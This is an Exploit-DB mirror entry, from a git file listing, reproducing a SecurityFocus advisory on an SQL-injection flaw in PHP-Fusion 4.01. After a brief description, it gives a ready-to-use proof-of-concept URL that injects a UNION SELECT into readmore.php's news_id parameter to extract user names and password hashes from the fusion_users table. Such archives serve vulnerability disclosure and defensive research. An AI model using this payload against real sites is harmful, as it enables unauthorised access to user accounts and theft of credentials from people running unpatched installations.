exploit-db-mirror/platforms/php/webapps/32242.txt
Offensive Security 97f8c52d74 Updated 03_15_2014
2014-03-15 04:29:27 +00:00

9 lines
No EOL
599 B
Text
Executable file

source: http://www.securityfocus.com/bid/30680/info
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP-Fusion 4.01 is vulnerable; other versions may also be affected.
http://www.example.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*